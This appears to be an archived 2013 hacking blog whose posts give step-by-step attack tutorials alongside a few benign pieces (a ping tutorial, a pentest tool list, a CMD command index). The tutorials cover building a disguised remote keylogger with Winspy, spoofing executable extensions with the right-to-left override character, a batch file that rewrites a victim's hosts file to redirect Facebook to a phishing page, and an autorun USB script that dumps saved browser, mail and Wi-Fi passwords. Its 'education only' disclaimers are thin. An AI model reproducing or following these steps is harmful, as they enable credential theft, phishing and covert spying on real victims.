Saturday, 20 July 2013

New Facebook Chat 2013 Code Generator [Upadated with New Codes]





The biggest Social Media Network, Facebook. Previously I have shared few Tricks for Facebook. Hope you have enjoyed all I have shared about Facebook tricks. But today I am going to share another trick with my friend because everyday people wants something new and we all have to find something new for our visitors. So today I have decided to share New Facebook Chat Codes Generator with you. This code generator will generate such codes instead of you text. You just have to paste those codes in you Facebook chat.


Facebook Chat Code Generator:-











Friday, 19 July 2013

Hack Facebook Account With Keylogger




What Is Keyloggers?

Using key logger utility you will be able to establish full control over your computer. You will also find out, what was going on your computer in your absence: what was run and typed etc. which act as best children internet protection software. Using the keylogging program constantly, you can restore the previously typed text in case you have lost it. Keystroke logger software works in the hidden mode and invisible on Windows operating system including Windows 7/VISTA/XP/Server 2008/NT/98 etc. It can send U what ur Victim Typed via Emails, FTP, PHP site, etc.



1) Hardware:- Special computer devices for keylogging are available. They are connected to the keyboard wire and then to the CPU. It looks like the keyboard wire's part and cant be easily detected.When needed the device can be disconnected and the logs can be viewed.
*Bad points:- This method is mostly not preferred for hacking facebook passwords, as the devices are costly and need physical access to the computer.


) Software :- There are thousands of different keylogger software which provide the user with a wide range of options.From them the keylogger which can be remotely installed is preferred for hacking Facebook passwords.They keep log of the keys pressed on the target's computer while remaining hidden and after some specific time send it as a email to the user without the target's knowledge..
*Bad points :-Most of the keyloggers are detected by the Antivirus and Firewall softwares, but some keyloggers are able to bypass the Antivirus and Firewall software. You also have to convince the target to install the keylogger while remote installing it.


Below i will show you on How to hack facebook passwords with winspy and sniperspy Softwares.
1). Sniper Spy (Remote Install Supported)


SniperSpy is the industry leading Remote password hacking software combined with the Remote Install and Remote Viewing feature.
Once installed on the remote PC(s) you wish, you only need to login to your own personal SniperSpy account to view activity logs of the remote PC’s! This means that you can view logs of the remote PC’s from anywhere in the world as long as you have internet access!
Do you want to Spy on a Remote PC? Expose the truth behind the lies! Unlike the rest, SniperSpy allows you to remotely spy any PC like a television! Watch what happens on the screen LIVE! The only remote PC spy software with a SECURE control panel!
This Remote PC Spy software also saves screenshots along with text logs of chats, websites, keystrokes in any language and more. Remotely view everything your child, employee or anyone does while they use your distant PC. Includes LIVE admin and control commands.


Click here to read the review of sniperspy

2).Winspy Keylogger
1. First of all free download Winspy keylogger software from link given below:


Download Winspy Keylogger 
  

2. After downloading winspy keylogger to hack Facebook account password, run the application. On running, a dialog box will be prompted. Now, create an user-id and password on first run and hit apply password. Remember this password as it is required each time you start Winspy and even while uninstalling.

3. Now, another box will come, explaining you the hot keys(Ctrl + Shift + F12) to start the Winspy keylogger software.


4. Now, on pressing hot keys, a login box will come asking userid and password. Enter them and click OK.


5. Now, Winspy’s main screen will be displayed as shown in image below:


6. Select Remote at top, then Remote install.

7. On doing this, you will get a popup box as shown in image. Now, fill in the following information in this box.


 .user - type in the victim’s name
.file name - Name the file to be sent. Use the name such that victim will love to accept it.
.file icon - keep it the same
.picture - select the picture you want to apply to the keylogger.
In the textfield of “Email keylog to”, enter your email address. Hotmail accounts do not accept keylog files, so use another emailaccount id,my sugession is using a Gmail id
Thats it. This much is enough. If you want, can change other settings also.

8. After you have completed changing settings, click on “Create Remote file”. Now just add your picture to a winrar archive. Now, what you have to do is only send this keylog file to your victim. When victim will open this file, all keystrokes typed by victim will be sent to your email inbox. Thus, you will get all his passwords and thus will be able to hack his email accounts and even Facebook account password.




Personal Tip
 :- Try the keyloggers which come under the parental control category which are used by parents to keep an eye on the child's online activities. This keylogger are mostly Antivirus and Firewall friendly. The AV and firewall wont detect them because if they did detect it then the child will come to know about it and it will be of no use. The only short coming of these keylogger is that they dont have remote installation feature.
Note: This tutorial is only for Educational Purposes, I did not take any responsibility of any misuse, you will be solely responsible for any misuse that you do. Hacking email accounts is criminal activity and is punishable under cyber crime.

Thursday, 18 July 2013

Change File Extension Using Custom Exploit



FILE EXTENSION EXPLOIT BY Hackerkonka ! Make any .exe look like a jpeg, mp3 or whatever you like! No need to Use Extension Spoofers they may Keyloggers Themselves. They also use This Exploit To Spoof By Soft. Better to Use safe Method Directly !


TUTORIAL:

This tutorial will show you how to make your .exe (or .com/.scr) files look like .jpeg/.mp3 or any other filetype! By normally changing the EXTENSION to e.g .mp3, will corrupt your file, but with this exploit your file will still be executable!


1. I have my server.exe, but I want it to look like a mp3 file, so people would run it. In this case, you should change the .exe to .scr to make it look more legit in the end.

Now, rename your to server.scr (which is still executable) to "song name uploaded by .SCR" (notice the space).


2.Now it's time to use the exploit! Open up the Character Map

press on  windows button in keyboard then type Character map

Then Scroll down and find the "U+202E: Right-To-Left Override" character:


Click "Select" and then "Copy".

3. Now choose to rename your file, and paste the copied character right before the ".SCR" (press ctrl+v to paste)



Then type "3pm" (without the " ") and press Enter. Now it should look like this:


Done..!!



Most browsers have patched this, but it can be used on IM's like MSN or Yahoo Messenger. To upload the file to a filehost, you need to make a .rar file with your server inside.



Now go ahead and mix around with .exe/.scr/.com and the fake-extensions to find some other legit-looking combinations!

SOME PROBLEM? HERE IS SOLUTION:-

#1.Those who can't find the character in the default CharMap in windows, do this: (not sure if it works but worth a try)

1. Download BabelMap and run it.

2. Open as shown in this picture:

  • Make sure "Single Font" is ticked and "Arial Unicode MS" is chosen as Font.
  • Search for OVERRIDE and click on the RTLO character (row 2020, column E)
  • Click on the Select-button
  • Click on the Copy button
  • Now Do as Above Steps.
#2.Not able to change your .exe file to .scr ?

Do Not worry we have all solution. 
#1. Open My Computer.
#2. Choose View Scroll Down Menu At Menu Bar.
#3. Choose Folder Option
#4. Choose View Tab
#5. Unselect already selected this option 'Hide extension for known file types'
#6. Press 'Apply'

Done Now you can change .exe to .scr as of first step.


Done Enjoy Manual Exploit. It's Working i have tried read carefully before doing.
Any Problem Comment Down.
 Enjoy guys...

Finding Ip Address Of A Website Using Command Prompt Or CMD



In this tutorial i will teach you to find Ip Address of any website using Command Prompt or in short CMD. Using IP Address you can find location of the website server and do more stuff. I will demostrate this tutorial with Google but you can use this method to find IP Address of any website like twitter, facebook etc. So lets get started.
How to find IP ?


How to find IP ?

1. Go to Start > Type CMD and press Enter.

2. Now write Ping followed by website URL whose IP you want to find.


3. It will take less then a second and come up with the results as shown below.


In  my next post i will show you another easy way to find website IP Address and teach you to use this IP to find its location.

Have Fun Guys...

What is Windows Host File Hacking



Before knowing Host File Hacking we musk know what if 'Host File'.

What is Host file?

The hosts file is one of several system facilities that assists in addressing network nodes in a computer network. It is a common part of an operating system's Internet Protocol (IP) implementation, and serves the function of translating human-friendly hostnames into numeric protocol addresses, called IP addresses, that identify and locate a host in an IP network.

In some operating systems, the contents of the hosts file is used preferentially to other name resolution methods, such as the Domain Name System (DNS), but many systems implement name service switches, e.g., nsswitch.conf for Linux and Unix, to provide customization. Unlike remote DNS resolvers, the hosts file is under the direct control of the local computer's administrator.

Location of Host file in various system:-


Example of host file:

# This is an example of the hosts file
127.0.0.1  localhost loopback
::1 localhost

Tutorials:-

# Hack 1



A really awesome trick to play on a friend is to change his/her computer so that when he/she types in any address that it will go to any location you specify (obviously different from what it is supposed to be). For example you could change the computer settings so that when your friend types in www.google.com his/her computer actually goes to www.PrankSite.com. To do this simply open the host file (with notepad) located either in %windir%\ for Windows 95/98/Me or %SystemRoot%\system32\drivers\etc\ for Windows NT/2000/XP and add a line of code like the one below, on a blank line.

Example: 207.68.172.246 www.google.com


The number on the left is the IP address (the actual destination) and on right is the url the user will enter. After you make the change restart the computer, the next time your friend types in the address you changed he/she will be taken your prank site. 

Note 1: for those of you who don’t know how to find an IP address; Open the command prompt and type “ping www.anysite.com” (But change the url) and hit enter. 

Note 2: If you have spybot or antivirus search and destroy or some other anti-virus program it may make the Host file read only, so you will need to right click the host file, click properties and deselect read only, to be able edit the file.


# Hack 2


The other tutorial is same as above just replace ur site ip with 127.0.0.1 it will block that site. you can use it to block  any site..
example:


  • 127.0.0.1 www.facebook.com
  • 127.0.0.1 www.fb.com
  • 127.0.0.1 facebook.com
  • 127.0.0.1 fb.com


# Hack 3


It is use for desktop phishing. Desktop phishing is use to redirect original ip of that site to ur phish page sote or ur server that is computer which is server/site itself. It is the best phishing.

# Hack 4


Change your victim host details by sending him batch file:

1. open notepad.

2.Then copy paste following code into it:-

@echo off
echo 172.X.XX.X.X   www.facebook.com >> C:\windows\system32\drivers\etc\hosts
exit

Note: u can replace www.facebook.com to any site u want. and 172.X.XX.X.X to any ip of site you wan to redirect. if u wan to block it replace it with 127.0.0.1

3. save file as .bat extension.

Done send that batch file to your victim. and enjoy redirecting or blocking of sites or Desktop Phishing.

Any Doubts Comment down..
Enjoy...

NOTE:- For Education Purpose Only.

Hack Accounts With Desktop Phishing


Desktop phish is advanced phishing not as simple phishing.
How desktop phishing works?



Now u understand from pic that how desktop phishing works. Old  phishing it for sending link then it works. While desktop phish u have to send a batch file which victim has to be run as admin, and then what ever original links r typed will automatically redirect to ur phish page, here phish page is your computer or ur phish page what you want. If you use your computer as server/site then it is 100% safe. Is it awsome? Hence i make tutorial for you all fanz of hacker konka.


What is Host file?

The hosts file is one of several system facilities that assists in addressing network nodes in a computer network. It is a common part of an operating system's Internet Protocol (IP) implementation, and serves the function of translating human-friendly hostnames into numeric protocol addresses, called IP addresses, that identify and locate a host in an IP network.

In some operating systems, the contents of the hosts file is used preferentially to other name resolution methods, such as the Domain Name System (DNS), but many systems implement name service switches, e.g., nsswitch.conf for Linux and Unix, to provide customization. Unlike remote DNS resolvers, the hosts file is under the direct control of the local computer's administrator.


Tutorial:

What Do You Need ?

  • #1. A Phishers Page - A Fake Page, Lot of them Are available online.
  • # 2. ProXPN Vpn or Vpnium VPN- To eliminate the dynamic IP Hassle and other stuff.
  • # 3. XAMMP - A Web Server Service To Host The Fake Phishing Page.
  • # 4. Batch File ( script given below).
  • # 5. Brains And Luck


Step 1 : Download And Install XAMPP Software.

First Download and install xampp on your PC, Start Apache and Msql services, These are the basic services for a web server.
Link Here : Download


Step 2 : Install The Phishers Page In XAMMP Directory.

Make a phish page as shown here (do not follow other steps there just make phish page as shown),  Place all its contents in the ht docs folder which should be under Xammp (place were you installed xampp), Sure you can use other phishers page.


Step 3 : Install ProXPN or Vpnium VPN.

Now we use this tool to get a static IP, which would make our work a whole lot easier, Sure you can do its work without it but the chances would be low that the attack will succeed .
Get ProXPN : Download

OR you can use Vpnium VPN:- Download

Step 4 : Replace the Victims HOSTS File.

Now this step is a bit tricky, because you need to have physical access to victims pc for 5 Seconds, Or you can bind the Batch file to a software or something, but i'll stick to the physical access method.
Now open notepad and paste this code in it.

@echo off
echo 172.X.XX.X.X   www.facebook.com >> C:\windows\system32\drivers\etc\hosts
exit

You need to replace the 172.x.xx.x.x  feild with you IP (VPN) Address for this to work.
Now save this file as HOSTS replace.bat , sure you can use any name but the extension should be .bat.

NOTE: you can make batch file and enter ip address of your online phishing page site also. If u r using WiFi connection then change your host file no need to change others change your host file like below.

  • 127.0.0.1 www.facebook.com
  • 127.0.0.1 www.fb.com
  • 127.0.0.1 facebook.com
  • 127.0.0.1 fb.com 
Change your host file by opening notepad as administrator (main step), then open host file located at C:\windows\system32\drivers\etc\hosts , where hosts is file name without extension.

Step 5 : All Set And Ready To Be Launched.

Now put the batch file we created above to a usb drive and plug that drive into victims PC, now click on that batch file (when you have plugged that drive into the victims's pc) , and boom boom, you will get the victims credit when he access facebook.com and enters his/her credit.To see all the victims credentials and Password open newly created log.txt file which is under htdocs folder.


Why Do A Desktop Phishing Attack And Not Normal Phishing Attack ?

Below is why:-
















Enjoy hacking. u can hack any accounts with it just replace it with it phish page and site at host file.. :)
Any query comment down.

NOTE:- For Education Purpose Only.

Wednesday, 17 July 2013

Steal Any Passwords Of Computer Using USB



How to steal passwords from a computer with USB just in seconds???

Here is the tutorial you want fanz, you can steal any pass means all passwords related to that computer. it can also steal once saved browser passes.

Tutorial:-

How to make stealer?

Download This Ready made Files or make your own way as shown below. Pass Stealer.

Or Custom Making of stealer:

Step 1: Open Notepad and Create a new file.

Type or copy/paste Text below:-

[autorun]
open=launch.bat
ACTION= Perform a Virus Scan

Save this as AUTORUN.inf (NOTE: extension must be .inf  not .txt)

Step 2: Now again open Notepad and Create a new file.
Type or copy/paste Text below…

start mspass.exe /stext pass/mspass.txt
start mailpv.exe /stext pass/mailpv.txt
start iepv.exe /stext pass/iepv.txt
start pspv.exe /stext pass/pspv.txt
start PasswordFox.exe /stext pass/passwordfox.txt
start OperaPassView.exe /stext pass/OperaPassView.txt
start ChromePass.exe /stext pass/ChromePass.txt
start WebBrowserPassView.exe /stext pass/AllBrowserPass.txt
start mspass.exe /stext pass/msofficepass.txt
start RouterPassView.exe /stext pass/Router.txt
start Dialupass.exe /stext pass/Dialupass.txt
start netpass.exe /stext pass/netpass.txt
start WirelessKeyView.exe /stext pass/WirelessKeyView.txt

Save this as LAUNCH.bat
Now you have 2 files…

Step 3: Copy the autorun and launch file to your USB…


Step 4: Go to http://www.nirsoft.net/

And download the programs which you named in Step 2… and copy them with your other files that is autorun and launch.bat files.

How to use?


  • Now copy our ready made pass stealer files or your setup files to your usb drive. 
  • Now re-plug USB. 
  • Choose Perform A Virus Scan Option, on auto-run menu.
  • Era..!!! All Pass r steal and in pass folder.
  • You can run launch.bat file direct and steal pass.
Note: These File are may be deleted by antivirus. So be care-full.

Proof:-


NOTE:-Hacking passwords and id is under crime. you will get caught by police if you do that. I am sharing knowledge for education purpose only.Not my responsibility if you caught bye hacking. Do not hack passwords.

Top 15 Hacking | Cracking | Pentesting Tools of 2013



Here Represent Top 15 Hacking or cracking tools for you all hackerkonka fanz. They is bests of 2013 hacking tools.


1. PWN STAR:-

A bash script to launch the AP, can be configured with a variety of attack options. Including a php script and server index.html, for phishing. Can act as a multi-client captive portal using php and iptables. Exploitation classics such as crime-PDF, De-auth with aireplay, etc..


General Features:-



  • Managing Interfaces and MAC Spoofing
  • Set sniffing
  • Phishing Web
  • Karmetasploit
  • WPA handshake
  • De-auth client
  • Managing Iptables
2. ZED ATTACK PROXY (ZAP):-

(ZAP) is an integrated penetration testing tool for finding vulnerabilities in web applications. This tool is designed for use by people with a variety of security experience and as such is ideal for developers and functional testers who are new to penetration testing as well as being a useful addition to the toolbox tester.


Key Features:-


  • Intercepting Proxy
  • Active scanners
  • Passive scanners
  • Brute Force scanner
  • Spider
  • Fuzzer
  • Port Scanner
  • Dynamic SSL certificates
  • API
  • Beanshell integration

3. SET (SOCIAL ENGINEERING TOOLKIT):-

Tools that focus on attacking the human element of weakness and inadvertence. This tool is widely used today and is one of the most successful tools demonstrated at Defcon.

Key Features:-


  • Spear-Phishing Attack Vector
  • Java Applet Attack Vector
  • Metasploit Browser Exploit Method
  • Credential Harvester Attack Method
  • Tabnabbing Attack Method
  • Man Left in the Middle Attack Method
  • Web Jacking Attack Method
  • Multi-Attack Web Vector
  • Infectious Media Generator
  • Teensy USB HID Attack Vector


4. BURP SUITE:-

Burp Suite is a very nice tool for web application security testing. This tool is great for pentester and security researchers. It contains a variety of tools with many interfaces between them designed to facilitate and accelerate the process of web application attacks.

General Function:-


  • Interception proxies
  • Radar and spiders crawling
  • Webapps scanner
  • Tool assault
  • Repeater and sequencer tools

5. ETTERCAP:-

Ettercap is a multipurpose sniffer / interceptor / logger for Local Area Network . It supports active and passive dissection of many protocols (even in code) and includes many feature for network and host analysis.



General Function:-

  • To capture traffic and data
  • To do logging network Etc.

6. SANS INVESTIGATIVE FORENSIC TOOLKIT (SIFT)

The SANS Investigative Forensic Toolkit (SIFT) Workstation is a VMware Appliance that can be configured with all the requirements to perform a detailed digital forensic. Compatible with Expert Witness Format (E01), Advanced Forensic Format (AFF), and raw (dd) evidence formats. The new version has been completely rebuilt on the Ubuntu base with many additional tools and capabilities that are used in modern forensic technology.



General Function SIFT:-

  • iPhone, Blackberry, and Android Forensic Capabilities
  • Registry Viewer (YARU)
  • Compatibility with F-Response Tactical, Standard, and Enterprise
  • PTK 2.0 (Special Release - Not Available for Download)
  • Automated Generation Timeline via log2timeline
  • Many Firefox Investigative Tools
  • Windows Journal Parser and Shellbags Parser (jp and sbag)
  • Many Windows Analysis Utilities (prefetch, usbstor, event logs, and more)
  • Complete Overhaul of Regripper Plugins (added over 80 additional plugins)

7. WIRESHARK:-

Wireshark is the most widely used and most popular in the world the protocol analyzer, and is the de facto standard across many industries and educational institutions to analyze the network in different protocol.

General Function:-


  • Live capture and offline analysis
  • Standard three-pane packet browser
  • Multi-platform: Runs on Windows, Linux, OS X, Solaris, FreeBSD, NetBSD, and many others
  • Captured data network can be browsed via a GUI, or via the TTY-mode tshark utility
  • The most powerful display filters in the industry
  • Rich VoIP analysis
  • Read / write many different capture file formats Etc.

8. WEBSPLOIT:-


WebSploit is an Open Source Project for Remote Scan and Analysis System of the weaknesses in web applications.


Key Features: -


[>] Social Engineering Works
[>] Scan, Web Crawler & Analysis
[>] Automatic Exploiter
[>] Support Network Attacks
-
[+] Autopwn - Used From Metasploit For Scan and Exploit Target Service
[+] WMAP - Scan, Target Used Crawler From Metasploit WMAP plugin
[+] format infector - inject the payload into reverse and bind file format
[+] phpmyadmin Scanner
[+] LFI Bypasser
[+] Apache Users Scanner
[+] Dir Bruter
[+] admin finder
[ +] MLITM Attack - Man Left In The Middle, XSS Phishing Attacks
[+] MITM - Man In The Middle Attack
[+] Java Applet Attack
[+] MFOD Attack Vector
[+] USB Infection Attack
[+] Dos ARP Attack
[+ ]'s Killer Attack
[+] Attack Fake Update
[+] Fake Access Point Attack




9. WINAUTOPWN:-

WinAutoPWN is a tool that is used to exploit the Windows Framework directly, so that we are automatically going to be an administrator on the windows. Widely used by "Defacer" Indonesia to deface the Windows Server


10. HASHCAT:-

Hashcat are a variety of tools to crack passwords in encrypted, it is very powerful for password recovery.

General Function:-

  • Multi-Threaded
  • Free
  • Multi-Hash (up to 24 million hashes)
  • Multi-OS (Linux, Windows and OSX native binaries)
  • Multi-Algo (MD4, MD5, SHA1, DCC, NTLM, MySQL, ...)
  • SSE2 accelerated
  • All Attack-Modes except Brute-Force and Permutation can be extended by rules
  • Very fast Rule-engine
  • Rules compatible with JTR and PasswordsPro
  • Possible to resume or limit session
  • Automatically recognizes recovered hashes from outfile at startup
  • Can automatically generate random rules
  • Load saltlist from an external file and then use them in a Brute-Force Attack variant
  • Able to work in an distributed environment
  • Specify multiple wordlists or multiple directories of wordlists
  • Number of threads can be configured
  • Lowest priority threads run on
  • 30 + Algorithms is implemented with performance in mind ... and much more

11. UNISCAN:-

Uniscan is a scanner for web applications, written in perl for Linux. Currently Uniscan version is 6.2.

General Function:-


  • Identification of system pages through a Web Crawler.
  • Use of threads in the crawler.
  • Control the maximum number of requests the crawler.
  • Control of variation of system pages identified by Web Crawler.
  • Control of file extensions that are ignored.
  • Test of pages found via the GET method.
  • Test the forms found via the POST method.
  • Support for SSL requests ( HTTPS ).
  • Proxy support.
  • Generate site list using Google.
  • Generate site list using Bing.
  • Plug-in support for Crawler.
  • Plug-in support for dynamic tests.
  • Plug-in support for static tests.
  • Plug-in support for stress tests.
  • Multi-language support.
  • Web client.

12. OLYYDBG:-

OllyDbg is a 32-bit assembler debugger for Microsoft Windows. Emphasis on binary code analysis makes it particularly useful in cases where source code is not available.

General Function:-

  • Intuitive user interface, no cryptical commands
  • Code analysis - traces registers, recognizes procedures, loops, API calls, switches, tables, constants and strings
  • Directly loads and debugs DLLs
  • Object file scanning - locates routines from object files and libraries
  • Allows for user-defined labels, comments and function descriptions
  • Understands debugging information in Borland ® format
  • Saves patches between sessions, writes them back to executable file and updates fixups
  • Open architecture - many third-party plugins are available
  • No installation - no trash in registry or system directories
  • Debugs multithreaded applications
  • Attaches to running programs
  • Configurable disassembler, supports both MASM and IDEAL formats
  • MMX, 3DNow! and SSE instructions and the data types, Including Athlon extensions
  • Full UNICODE support
  • Dynamically recognizes ASCII and UNICODE strings - also in Delphi format!
  • Recognizes complex code constructs, like call to jump to procedure
  • Decodes calls to more than 1900 standard API and 400 C functions
  • Gives context-sensitive help on API functions from external help file
  • Sets conditional, logging, memory and hardware breakpoints
  • Traces program execution, logs arguments of known functions
  • Shows fixups
  • Dynamically traces stack frames
  • Searches for imprecise commands and masked binary sequences
  • Searches whole allocated memory
  • Finds references to constant or address range
  • Examines and modifies memory , sets breakpoints and Pauses program on-the-fly
  • Assembles commands into the shortest binary form
  • Starts from the floppy disk

13. BBQSQL:-

BBQSQL an Opensource SQL injection tools with the framework specifically designed to carry out the process in hyper fast, database agnostic, easy to setup, and easy to modify. This is another amazing release from Arsenal Blackhat USA 2012. When conducting security assessments of applications, we often find that it is difficult to SQL vulnerabilities exploitable, with this tool will be extremely easy.

BBQSQL written in the Python programming language. This is very useful when complex SQL injection attack vulnerabilities. BBQSQL also a semi-automated tool, which allows little customization for those who are finding it difficult to trigger a SQL injection. The tool is built to be database agnostic and very versatile. It also has an intuitive UI for setting up the attack much easier.

General Function:-


  • SQL Injection Tools
  • URL
  • HTTP Method
  • Headers
  • Cookies
  • Encoding methods
  • Redirect behavior
  • Files
  • HTTP Auth
  • Proxies

14. CRYPTOHAZE:-

Tools to crack password / hash where cryptohaze supports CUDA, OpenCL , and the CPU code (SSE, AVX, etc.). Can run on OS that support CUDA. These are intended to make it easier to pentester did crack the hash.


General Function:-


  • Crack various kinds of hash
  • Showing results from crackhash
  • Cracking on various OS platforms

15. SAMURAI WEB TESTING FRAMEWORK (SWTF):-

SWTF is used to do testing / pentest against web application, is used to find a weakness and exploited to perform web. Very comprehensive and widely used in the world, including one used by staff binushacker.

General Function:-


  • Web Scanner
  • Web Mapping
  • Web Exploitation


Note: This tutorial is only for Educational Purposes, I did not take any responsibility of any misuse, you will be solely responsible for any misuse that you do.

Monday, 15 July 2013

A-Z Index of the Windows CMD command line


A
   ADDUSERS Add or list users to/from a CSV file
   ADmodcmd Active Directory Bulk Modify
   ARP      Address Resolution Protocol
   ASSOC    Change file extension associations•
   ASSOCIAT One step file association
   ATTRIB   Change file attributes
b
   BCDBOOT  Create or repair a system partition
   BITSADMIN Background Intelligent Transfer Service
   BOOTCFG  Edit Windows boot settings
   BROWSTAT Get domain, browser and PDC info
c
   CACLS    Change file permissions
   CALL     Call one batch program from another•
   CD       Change Directory - move to a specific Folder•
   CHANGE   Change Terminal Server Session properties
   CHKDSK   Check Disk - check and repair disk problems
   CHKNTFS  Check the NTFS file system
   CHOICE   Accept keyboard input to a batch file
   CIPHER   Encrypt or Decrypt files/folders
   CleanMgr Automated cleanup of Temp files, recycle bin
   CLEARMEM Clear memory leaks
   CLIP     Copy STDIN to the Windows clipboard
   CLS      Clear the screen•
   CLUSTER  Windows Clustering
   CMD      Start a new CMD shell
   CMDKEY   Manage stored usernames/passwords
   COLOR    Change colors of the CMD window•
   COMP     Compare the contents of two files or sets of files
   COMPACT  Compress files or folders on an NTFS partition
   COMPRESS Compress individual files on an NTFS partition
   CON2PRT  Connect or disconnect a Printer
   CONVERT  Convert a FAT drive to NTFS
   COPY     Copy one or more files to another location•
   CSCcmd   Client-side caching (Offline Files)
   CSVDE    Import or Export Active Directory data
d
   DATE     Display or set the date•
   DEFRAG   Defragment hard drive
   DEL      Delete one or more files•
   DELPROF  Delete user profiles
   DELTREE  Delete a folder and all subfolders
   DevCon   Device Manager Command Line Utility
   DIR      Display a list of files and folders•
   DIRUSE   Display disk usage
   DISKPART Disk Administration
   DISKSHADOW Volume Shadow Copy Service
   DNSSTAT  DNS Statistics
   DOSKEY   Edit command line, recall commands, and create macros
   DriverQuery Display installed device drivers
   DSACLs   Active Directory ACLs
   DSAdd    Add items to active directory (user group computer)
   DSGet    View items in active directory (user group computer)
   DSQuery  Search for items in active directory (user group computer)
   DSMod    Modify items in active directory (user group computer)
   DSMove   Move an Active directory Object
   DSRM     Remove items from Active Directory
e
   ECHO     Display message on screen•
   ENDLOCAL End localisation of environment changes in a batch file•
   ERASE    Delete one or more files•
   EVENTCREATE Add a message to the Windows event log
   EXIT     Quit the current script/routine and set an errorlevel•
   EXPAND   Uncompress files
   EXTRACT  Uncompress CAB files
f
   FC       Compare two files
   FIND     Search for a text string in a file
   FINDSTR  Search for strings in files
   FOR /F   Loop command: against a set of files•
   FOR /F   Loop command: against the results of another command•
   FOR      Loop command: all options Files, Directory, List•
   FORFILES Batch process multiple files
   FORMAT   Format a disk
   FREEDISK Check free disk space (in bytes)
   FSUTIL   File and Volume utilities
   FTP      File Transfer Protocol
   FTYPE    File extension file type associations•
g
   GETMAC   Display the Media Access Control (MAC) address
   GLOBAL   Display membership of global groups
   GOTO     Direct a batch program to jump to a labelled line•
   GPRESULT Display Resultant Set of Policy information
   GPUPDATE Update Group Policy settings
h
   HELP     Online Help
i
   iCACLS   Change file and folder permissions
   IF       Conditionally perform a command•
   IFMEMBER Is the current user a member of a Workgroup
   IPCONFIG Configure IP
k
   KILL     Remove a program from memory
l
   LABEL    Edit a disk label
   LOCAL    Display membership of local groups
   LOGEVENT Write text to the event viewer
   LOGMAN   Manage Performance Monitor
   LOGOFF   Log a user off
   LOGTIME  Log the date and time in a file
m
   MAPISEND Send email from the command line
   MBSAcli  Baseline Security Analyzer
   MEM      Display memory usage
   MD       Create new folders•
   MKLINK   Create a symbolic link (linkd)
   MODE     Configure a system device
   MORE     Display output, one screen at a time
   MOUNTVOL Manage a volume mount point
   MOVE     Move files from one folder to another•
   MOVEUSER Move a user from one domain to another
   MSG      Send a message
   MSIEXEC  Microsoft Windows Installer
   MSINFO32 System Information
   MSTSC    Terminal Server Connection (Remote Desktop Protocol)
   MV       Copy in-use files
n
   NET      Manage network resources
   NETDOM   Domain Manager
   NETSH    Configure Network Interfaces, Windows Firewall & Remote access
   NETSVC   Command-line Service Controller
   NBTSTAT  Display networking statistics (NetBIOS over TCP/IP)
   NETSTAT  Display networking statistics (TCP/IP)
   NOW      Display the current Date and Time
   NSLOOKUP Name server lookup
   NTBACKUP Backup folders to tape
   NTRIGHTS Edit user account rights
o
   OPENFILES Query or display open files
p
   PATH     Display or set a search path for executable files•
   PATHPING Trace route plus network latency and packet loss
   PAUSE    Suspend processing of a batch file and display a message•
   PERMS    Show permissions for a user
   PERFMON  Performance Monitor
   PING     Test a network connection
   POPD     Return to a previous directory saved by PUSHD•
   PORTQRY  Display the status of ports and services
   POWERCFG Configure power settings
   PRINT    Print a text file
   PRINTBRM Print queue Backup/Recovery
   PRNCNFG  Display, configure or rename a printer
   PRNMNGR  Add, delete, list printers set the default printer
   PROMPT   Change the command prompt•
   PsExec     Execute process remotely
   PsFile     Show files opened remotely
   PsGetSid   Display the SID of a computer or a user
   PsInfo     List information about a system
   PsKill     Kill processes by name or process ID
   PsList     List detailed information about processes
   PsLoggedOn Who's logged on (locally or via resource sharing)
   PsLogList  Event log records
   PsPasswd   Change account password
   PsService  View and control services
   PsShutdown Shutdown or reboot a computer
   PsSuspend  Suspend processes
   PUSHD    Save and then change the current directory•
q
   QGREP    Search file(s) for lines that match a given pattern
   Query Process    Display processes (TS/Remote Desktop)
   Query Session    Display all sessions (TS/Remote Desktop)
   Query TermServer List all servers (TS/Remote Desktop)
   Query User       Display user sessions (TS/Remote Desktop)
r
   RASDIAL  Manage RAS connections
   RASPHONE Manage RAS connections
   RECOVER  Recover a damaged file from a defective disk
   REG      Registry: Read, Set, Export, Delete keys and values
   REGEDIT  Import or export registry settings
   REGSVR32 Register or unregister a DLL
   REGINI   Change Registry Permissions
   REM      Record comments (remarks) in a batch file•
   REN      Rename a file or files•
   REPLACE  Replace or update one file with another
   Reset Session  Delete a Remote Desktop Session
   RD       Delete folder(s)•
   RMTSHARE Share a folder or a printer
   ROBOCOPY Robust File and Folder Copy
   ROUTE    Manipulate network routing tables
   RUN      Start | RUN commands
   RUNAS    Execute a program under a different user account
   RUNDLL32 Run a DLL command (add/remove print connections)

s
   SC       Service Control
   SCHTASKS Schedule a command to run at a specific time
   SCLIST   Display Services
   SET      Display, set, or remove session environment variables•
   SETLOCAL Control the visibility of environment variables•
   SETX     Set environment variables
   SFC      System File Checker
   SHARE    List or edit a file share or print share
   ShellRunAs Run a command under a different user account
   SHIFT    Shift the position of batch file parameters•
   SHORTCUT Create a windows shortcut (.LNK file)
   SHOWGRPS List the Workgroups a user has joined
   SHOWMBRS List the Users who are members of a Workgroup
   SHUTDOWN Shutdown the computer
   SLEEP    Wait for x seconds
   SLMGR    Software Licensing Management (Vista/2008)
   SOON     Schedule a command to run in the near future
   SORT     Sort input
   START    Start a program, command or batch file•
   SU       Switch User
   SUBINACL Edit file and folder Permissions, Ownership and Domain
   SUBST    Associate a path with a drive letter
   SYSTEMINFO List system configuration
t
   TAKEOWN  Take ownership of a file
   TASKLIST List running applications and services
   TASKKILL Remove a running process from memory
   TIME     Display or set the system time•
   TIMEOUT  Delay processing of a batch file
   TITLE    Set the window title for a CMD.EXE session•
   TLIST    Task list with full path
   TOUCH    Change file timestamps  
   TRACERT  Trace route to a remote host
   TREE     Graphical display of folder structure
   TSSHUTDN Remotely shut down or reboot a terminal server
   TYPE     Display the contents of a text file•
   TypePerf Write performance data to a log file
u
   USRSTAT  List domain usernames and last login
v
   VER      Display version information•
   VERIFY   Verify that files have been saved•
   VOL      Display a disk label•
w
   WAITFOR  Wait for or send a signal
   WHERE    Locate and display files in a directory tree
   WHOAMI   Output the current UserName and domain
   WINDIFF  Compare the contents of two files or sets of files
   WINMSDP  Windows system report
   WINRM    Windows Remote Management
   WINRS    Windows Remote Shell
   WMIC     WMI Commands
   WUAUCLT  Windows Update
x
   XCACLS   Change file and folder permissions
   XCOPY    Copy files and folders

 

Visitors Info.

You are from
%%v_FLG%% %%v_IP%%
%%v_CR%% ,%%v_RG%%, %%v_CI%%
%%v_OS_IMG%% %%v_OS%%
%%v_BRW_IMG%% %%v_BRW%%
